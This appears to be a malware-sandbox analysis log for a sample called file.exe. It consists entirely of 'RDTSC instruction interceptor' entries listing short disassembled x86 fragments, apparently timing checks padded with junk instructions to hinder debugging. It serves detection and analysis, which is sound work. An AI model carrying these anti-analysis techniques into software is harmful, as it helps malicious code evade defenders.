Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DDD1 second address: D5DE16 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F0BCDB08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 226967DAh 0x00000011 or cx, D939h 0x00000016 push 00000003h 0x00000018 mov ecx, dword ptr [ebp+122D2E15h] 0x0000001e push 00000000h 0x00000020 jo 00007F70F0BCDB0Ch 0x00000026 mov dword ptr [ebp+122D1C38h], esi 0x0000002c push 00000003h 0x0000002e add dword ptr [ebp+122D2366h], ebx 0x00000034 call 00007F70F0BCDB09h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE16 second address: D5DE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE1A second address: D5DE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE33 second address: D5DE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE3D second address: D5DE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE41 second address: D5DE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F70F070E5C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DE53 second address: D5DE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF36 second address: D5DF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jc 00007F70F070E5D0h 0x0000000d jmp 00007F70F070E5CAh 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D2ACDh] 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2156h], esi 0x00000021 push EDE259D0h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DF66 second address: D5DFE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e add dword ptr [esp], 121DA6B0h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F70F0BCDB08h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jmp 00007F70F0BCDB0Eh 0x00000034 mov cx, ax 0x00000037 push 00000003h 0x00000039 mov di, 9810h 0x0000003d push 00000000h 0x0000003f adc di, 6A9Ah 0x00000044 push 00000003h 0x00000046 jmp 00007F70F0BCDB0Eh 0x0000004b call 00007F70F0BCDB09h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F70F0BCDB06h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DFE2 second address: D5E029 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F70F070E5D9h 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F070E5D6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E029 second address: D5E056 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F70F0BCDB06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F70F0BCDB16h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8056D second address: D80573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80573 second address: D80586 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 je 00007F70F0BCDB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EB6B second address: D7EB7D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EB7D second address: D7EB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F4E6 second address: D7F4F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70F070E5CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72A36 second address: D72A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 pop ebx 0x0000000a jng 00007F70F0BCDB0Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 jnc 00007F70F0BCDB06h 0x0000001b pop edx 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D564FF second address: D56509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F070E5C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56509 second address: D5650D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5650D second address: D56513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F7B2 second address: D7F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jg 00007F70F0BCDB06h 0x0000000f jg 00007F70F0BCDB06h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F7C8 second address: D7F7CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FD41 second address: D7FD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FFCC second address: D7FFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80134 second address: D80138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80138 second address: D8015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8015A second address: D8015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80420 second address: D80431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5CBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80431 second address: D80435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87EEE second address: D87EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86F7A second address: D86F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnl 00007F70F0BCDB06h 0x00000011 jnl 00007F70F0BCDB06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F70F0BCDB0Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CF7E second address: D8CFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pushad 0x00000008 jmp 00007F70F070E5D2h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFA6 second address: D8CFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFB2 second address: D8CFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFB6 second address: D8CFBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3C3 second address: D8C3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F070E5D4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3DD second address: D8C3F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB0Dh 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C3F7 second address: D8C41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 jmp 00007F70F070E5D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C804 second address: D8C808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C808 second address: D8C81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB03 second address: D8CB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB0B second address: D8CB2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F70F070E5C6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jnl 00007F70F070E5C8h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB2E second address: D8CB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CB33 second address: D8CB38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCCD second address: D8FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCDD second address: D8FCFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F70F070E5CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jc 00007F70F070E5C6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FCFB second address: D8FD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A5C second address: D91A61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AF2 second address: D91B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F70F0BCDB17h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B19 second address: D91B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B20 second address: D91B40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F70F0BCDB13h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B40 second address: D91B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F070E5D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B70 second address: D91B8C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B8C second address: D91BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9201F second address: D92023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92023 second address: D92035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jp 00007F70F070E5C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92190 second address: D921B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B4 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B8 second address: D921BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921BC second address: D921C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5852 second address: DD5891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5891 second address: DD5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4FEC second address: DD5005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5005 second address: DD500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD500B second address: DD5031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB10h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F70F0BCDB10h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5E19 second address: DD5E31 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5F91 second address: DD5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6255 second address: DD6275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 jns 00007F70F070E5C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD828 second address: DDD82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD82E second address: DDD847 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD847 second address: DDD84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFD2A second address: DDFD55 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F070E5C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D9h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D03 second address: DE2D0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F70F0BCDB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D0D second address: DE2D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D13 second address: DE2D1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2ECC second address: DE2ED6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B52 second address: DE6B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B5A second address: DE6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6CCD second address: DE6CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F70 second address: DE6F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F78 second address: DE6F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F7C second address: DE6F86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F86 second address: DE6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECDA4 second address: DECDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECDAB second address: DECDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F70F0BCDB18h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED31A second address: DED322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED322 second address: DED32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F70F0BCDB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED32D second address: DED35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70F070E5D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED35B second address: DED381 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F70F0BCDB1Dh 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF25F3 second address: DF260D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F70F070E5C6h 0x0000000a jng 00007F70F070E5C6h 0x00000010 jng 00007F70F070E5C6h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF272D second address: DF273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF273A second address: DF2746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B46 second address: DF2B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B4A second address: DF2B54 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
